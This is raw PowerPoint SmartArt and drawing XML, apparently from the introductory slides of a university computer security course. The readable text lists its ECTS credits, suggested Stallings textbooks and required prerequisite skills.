    <dgm:cxn modelId="{7F63BA88-1181-457A-9F81-82011AC7F358}" type="presParOf" srcId="{4F9AE281-FFF0-49B7-9352-188252AFB682}" destId="{623BEDAB-0EE8-4D07-9A70-B72DF6793024}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A081998F-1B97-4AF3-9A2D-CF037FE610FC}" type="presParOf" srcId="{4F9AE281-FFF0-49B7-9352-188252AFB682}" destId="{E9CCC69B-F84B-4B99-8466-909E33F65FFB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{8B8E2A3D-FE37-4A7D-96DF-CA363A96DC05}" type="presParOf" srcId="{E9CCC69B-F84B-4B99-8466-909E33F65FFB}" destId="{36432EF6-D733-4859-9E04-F30EA3B51EF1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7AEB5EED-AD05-4F47-89AA-236F54471994}" type="presParOf" srcId="{E9CCC69B-F84B-4B99-8466-909E33F65FFB}" destId="{880A38CD-77D5-4AA1-8893-9A14B962DB35}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{225A94D4-47DF-4F41-872E-36AB139E262B}" type="presParOf" srcId="{E9CCC69B-F84B-4B99-8466-909E33F65FFB}" destId="{1C567CC2-AFA0-4321-9A29-DD8F3F0F2143}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{33A20BAE-2D66-46DA-84C3-0DD9E83621EC}" type="presParOf" srcId="{E9CCC69B-F84B-4B99-8466-909E33F65FFB}" destId="{3DBB033C-13AE-4A9E-88B8-8532276F612E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2317A889-6238-479A-B6C7-7BD101B205AC}" type="presParOf" srcId="{E9CCC69B-F84B-4B99-8466-909E33F65FFB}" destId="{A7AD606D-6CD9-4A31-B46D-40A2404DA3C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8AF930-87BE-4549-A766-553372BDEF52}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/balance1" loCatId="relationship" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful1#1" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FB79C3D-F9D4-450B-87F3-822578F8AEE8}">
      <dgm:prSet phldrT="[Testo]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>D</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05F13A74-5197-491E-93DA-7811F9AED929}" type="parTrans" cxnId="{EAE8AF9E-E9DA-4F71-93A2-A724F8E5C812}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE70D980-A477-4596-9E5D-9F489DDC7405}" type="sibTrans" cxnId="{EAE8AF9E-E9DA-4F71-93A2-A724F8E5C812}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79272711-A2B3-4648-AD58-26D85E01CD7A}">
      <dgm:prSet phldrT="[Testo]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>L</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5167B42C-D701-4786-BCFF-C609B49591F0}" type="sibTrans" cxnId="{5EA4D8C5-493B-4047-BF7C-63AAE57E2B82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB5B3B3B-CD87-4F55-AA96-7A69E5B765E7}" type="parTrans" cxnId="{5EA4D8C5-493B-4047-BF7C-63AAE57E2B82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A77AC49E-EB8F-4B71-8855-B16C830D1F21}">
      <dgm:prSet phldrT="[Testo]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> €€€€</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3497FD02-0031-40F9-9D6B-B343F0045069}" type="sibTrans" cxnId="{F3511D1B-21CC-4481-833E-DF29FD23B610}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5CD885BF-C92D-4D4B-BF22-B0F2CAF97A4F}" type="parTrans" cxnId="{F3511D1B-21CC-4481-833E-DF29FD23B610}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C1A543F-9269-4F76-A3F0-F264EBAC1135}">
      <dgm:prSet phldrT="[Testo]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>S</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ACE43323-D7F5-45B9-9E84-F6E0D4744B1D}" type="sibTrans" cxnId="{F7AF4D0C-5FD6-4647-A776-419BC7008F4B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E503FA15-A7E9-4CF9-BBF5-B47FF5C4E2C7}" type="parTrans" cxnId="{F7AF4D0C-5FD6-4647-A776-419BC7008F4B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3FCD77E-EBFD-410B-9DDF-E209AC61AF97}">
      <dgm:prSet phldrT="[Testo]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> €€</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1766A7F8-D485-4CA7-9FDA-6048FF7C95A3}" type="sibTrans" cxnId="{6DC8DBD3-5B31-4809-9D67-8317DE9B34A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D192AEE-B6C7-401D-B084-DCB4200C09C2}" type="parTrans" cxnId="{6DC8DBD3-5B31-4809-9D67-8317DE9B34A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDD434EF-23AB-4572-B49F-27AC12574D8A}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="outerComposite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="2"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{81F4865C-05B3-4A53-94A4-75147F754F66}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="dummyMaxCanvas" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AFA71CC1-53D0-4D04-98FA-8A538428E46F}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="parentComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0F3477EA-6ECD-494C-A98B-E4F5506741AA}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="parent1" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="4" custLinFactNeighborX="-2778" custLinFactNeighborY="25000">
        <dgm:presLayoutVars>
          <dgm:chMax val="4"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{083DDE85-50BE-4C4A-87DF-5B54883598D7}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="parent2" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="4" custLinFactNeighborX="2778" custLinFactNeighborY="12500">
        <dgm:presLayoutVars>
          <dgm:chMax val="4"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C6542BD1-DC72-44A4-BF1C-268C626B754B}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="childrenComposite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8B3B7E97-0773-4809-A1EA-36532BE707E0}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="dummyMaxCanvas_ChildArea" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{80E67761-7713-4543-A98F-5DECABD5AB13}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="fulcrum" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="4" custLinFactNeighborY="15873"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1F7A33A-7969-4EC1-8C88-9D93CE74DB7C}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="balance_12" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0C7779E-00BD-42F8-B5FE-DA9D7409C6FE}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="right_12_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A33A195F-8537-4D2A-8340-010E7CB586D1}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="right_12_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE4DA90B-3B93-4AE9-A1B7-B65B24172BC0}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="left_12_1" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F7AF4D0C-5FD6-4647-A776-419BC7008F4B}" srcId="{A77AC49E-EB8F-4B71-8855-B16C830D1F21}" destId="{0C1A543F-9269-4F76-A3F0-F264EBAC1135}" srcOrd="1" destOrd="0" parTransId="{E503FA15-A7E9-4CF9-BBF5-B47FF5C4E2C7}" sibTransId="{ACE43323-D7F5-45B9-9E84-F6E0D4744B1D}"/>
    <dgm:cxn modelId="{F3511D1B-21CC-4481-833E-DF29FD23B610}" srcId="{908AF930-87BE-4549-A766-553372BDEF52}" destId="{A77AC49E-EB8F-4B71-8855-B16C830D1F21}" srcOrd="1" destOrd="0" parTransId="{5CD885BF-C92D-4D4B-BF22-B0F2CAF97A4F}" sibTransId="{3497FD02-0031-40F9-9D6B-B343F0045069}"/>
    <dgm:cxn modelId="{508B141D-1A14-4017-AC0E-EDDDEBCF05FD}" type="presOf" srcId="{908AF930-87BE-4549-A766-553372BDEF52}" destId="{DDD434EF-23AB-4572-B49F-27AC12574D8A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{77A8F13C-3B25-4AC9-B784-4FE929093849}" type="presOf" srcId="{A77AC49E-EB8F-4B71-8855-B16C830D1F21}" destId="{083DDE85-50BE-4C4A-87DF-5B54883598D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{D8D88C6F-55AE-4941-9FAA-61C83FA554A5}" type="presOf" srcId="{79272711-A2B3-4648-AD58-26D85E01CD7A}" destId="{CE4DA90B-3B93-4AE9-A1B7-B65B24172BC0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{F09C3F77-3015-40CD-88BA-98662F561780}" type="presOf" srcId="{A3FCD77E-EBFD-410B-9DDF-E209AC61AF97}" destId="{0F3477EA-6ECD-494C-A98B-E4F5506741AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{EAE8AF9E-E9DA-4F71-93A2-A724F8E5C812}" srcId="{A77AC49E-EB8F-4B71-8855-B16C830D1F21}" destId="{5FB79C3D-F9D4-450B-87F3-822578F8AEE8}" srcOrd="0" destOrd="0" parTransId="{05F13A74-5197-491E-93DA-7811F9AED929}" sibTransId="{DE70D980-A477-4596-9E5D-9F489DDC7405}"/>
    <dgm:cxn modelId="{3475F9AF-F1AC-4F1D-A715-28CF6C1FEA73}" type="presOf" srcId="{5FB79C3D-F9D4-450B-87F3-822578F8AEE8}" destId="{C0C7779E-00BD-42F8-B5FE-DA9D7409C6FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{5EA4D8C5-493B-4047-BF7C-63AAE57E2B82}" srcId="{A3FCD77E-EBFD-410B-9DDF-E209AC61AF97}" destId="{79272711-A2B3-4648-AD58-26D85E01CD7A}" srcOrd="0" destOrd="0" parTransId="{FB5B3B3B-CD87-4F55-AA96-7A69E5B765E7}" sibTransId="{5167B42C-D701-4786-BCFF-C609B49591F0}"/>
    <dgm:cxn modelId="{6DC8DBD3-5B31-4809-9D67-8317DE9B34A8}" srcId="{908AF930-87BE-4549-A766-553372BDEF52}" destId="{A3FCD77E-EBFD-410B-9DDF-E209AC61AF97}" srcOrd="0" destOrd="0" parTransId="{5D192AEE-B6C7-401D-B084-DCB4200C09C2}" sibTransId="{1766A7F8-D485-4CA7-9FDA-6048FF7C95A3}"/>
    <dgm:cxn modelId="{116FA6FB-E147-42C5-8C05-F43803DEE946}" type="presOf" srcId="{0C1A543F-9269-4F76-A3F0-F264EBAC1135}" destId="{A33A195F-8537-4D2A-8340-010E7CB586D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{F3812E6F-1417-4681-AFC5-8AE18B56842E}" type="presParOf" srcId="{DDD434EF-23AB-4572-B49F-27AC12574D8A}" destId="{81F4865C-05B3-4A53-94A4-75147F754F66}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{DB25A9CB-3C84-4FCF-B3B1-EFB9B24846DA}" type="presParOf" srcId="{DDD434EF-23AB-4572-B49F-27AC12574D8A}" destId="{AFA71CC1-53D0-4D04-98FA-8A538428E46F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{0C4E688F-C1B2-4CD4-B09E-3DE46C4F1F6E}" type="presParOf" srcId="{AFA71CC1-53D0-4D04-98FA-8A538428E46F}" destId="{0F3477EA-6ECD-494C-A98B-E4F5506741AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{D47F0A68-3FD3-4413-BAF4-43C8F5B5FC8B}" type="presParOf" srcId="{AFA71CC1-53D0-4D04-98FA-8A538428E46F}" destId="{083DDE85-50BE-4C4A-87DF-5B54883598D7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{A9355725-CBAC-4FB3-A86A-AEB9C83E71C1}" type="presParOf" srcId="{DDD434EF-23AB-4572-B49F-27AC12574D8A}" destId="{C6542BD1-DC72-44A4-BF1C-268C626B754B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{2C320BE8-3259-4DAE-AED9-3E0689779F5A}" type="presParOf" srcId="{C6542BD1-DC72-44A4-BF1C-268C626B754B}" destId="{8B3B7E97-0773-4809-A1EA-36532BE707E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{F2C820DB-F165-4C7B-8BC5-85DE1CC64481}" type="presParOf" srcId="{C6542BD1-DC72-44A4-BF1C-268C626B754B}" destId="{80E67761-7713-4543-A98F-5DECABD5AB13}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{E8D0255D-1DD8-4FBC-BCE7-1BD15CB9B81E}" type="presParOf" srcId="{C6542BD1-DC72-44A4-BF1C-268C626B754B}" destId="{E1F7A33A-7969-4EC1-8C88-9D93CE74DB7C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{20339AAE-0C11-4278-B16F-146DE4A751F0}" type="presParOf" srcId="{C6542BD1-DC72-44A4-BF1C-268C626B754B}" destId="{C0C7779E-00BD-42F8-B5FE-DA9D7409C6FE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{16BA521E-90F6-40EC-8F38-4C2BBC8A8409}" type="presParOf" srcId="{C6542BD1-DC72-44A4-BF1C-268C626B754B}" destId="{A33A195F-8537-4D2A-8340-010E7CB586D1}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{1DC46C8B-9665-4C19-BCB9-8EFD48A6E36C}" type="presParOf" srcId="{C6542BD1-DC72-44A4-BF1C-268C626B754B}" destId="{CE4DA90B-3B93-4AE9-A1B7-B65B24172BC0}"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B3357-4DD5-432B-AFE5-E9CFAE20C757}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="595"/>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76A6E-EC80-49E1-B265-460D9CEFB9FD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="421391" y="314027"/>
          <a:ext cx="766167" cy="766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641667-BE28-497A-9A60-8A1554B8BB86}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1608951" y="595"/>
          <a:ext cx="662064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6 ECTS (4 Theory + 2 Lab = 32+24 hours)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1608951" y="595"/>
        <a:ext cx="6620648" cy="1393031"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6EF8AC5E-7A08-4908-A2FE-B4D29172D176}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1741884"/>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DADB7-7183-4CE8-9F20-478A95274F71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="421391" y="2055316"/>
          <a:ext cx="766167" cy="766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ABD863-BDA8-4727-827E-4763CB223EE9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1608951" y="1741884"/>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Suggested material:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1608951" y="1741884"/>
        <a:ext cx="3703320" cy="1393031"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{25D5AD08-2CD2-477E-AA2C-B8C91FF3F437}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5312271" y="1741884"/>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kern="1200" dirty="0"/>
            <a:t>W. Stallings, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1300" i="1" kern="1200" dirty="0"/>
            <a:t>Cryptography and Network Security (7</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1300" i="1" kern="1200" baseline="30000" dirty="0"/>
            <a:t>th</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1300" i="1" kern="1200" dirty="0"/>
            <a:t>-8</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1300" i="1" kern="1200" baseline="30000" dirty="0"/>
            <a:t>th</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1300" i="1" kern="1200" dirty="0"/>
            <a:t> edition)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t>W. Stallings, Computer Security: Principles and Practice (4</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" baseline="30000" dirty="0"/>
            <a:t>th</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
            <a:t> edition)</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="it-IT" sz="1300" b="1" kern="1200"/>
            <a:t>Online material</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5312271" y="1741884"/>
        <a:ext cx="2917328" cy="1393031"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{36432EF6-D733-4859-9E04-F30EA3B51EF1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3483173"/>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A38CD-77D5-4AA1-8893-9A14B962DB35}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="421391" y="3796605"/>
          <a:ext cx="766167" cy="766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B033C-13AE-4A9E-88B8-8532276F612E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1608951" y="3483173"/>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en-GB" sz="2500" i="1" kern="1200"/>
            <a:t>Required skills:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1608951" y="3483173"/>
        <a:ext cx="3703320" cy="1393031"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A7AD606D-6CD9-4A31-B46D-40A2404DA3C3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5312271" y="3483173"/>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i="1" kern="1200"/>
            <a:t>Operating Systems, Computer Networks, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1300" kern="1200"/>
            <a:t>Databases, Web Information Systems, Scripting and programming</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="1300" i="1" kern="1200"/>
            <a:t>In other words, a bachelor degree in Computer Science</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5312271" y="3483173"/>
        <a:ext cx="2917328" cy="1393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477EA-6ECD-494C-A98B-E4F5506741AA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="298831" y="118813"/>
          <a:ext cx="855455" cy="475252"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
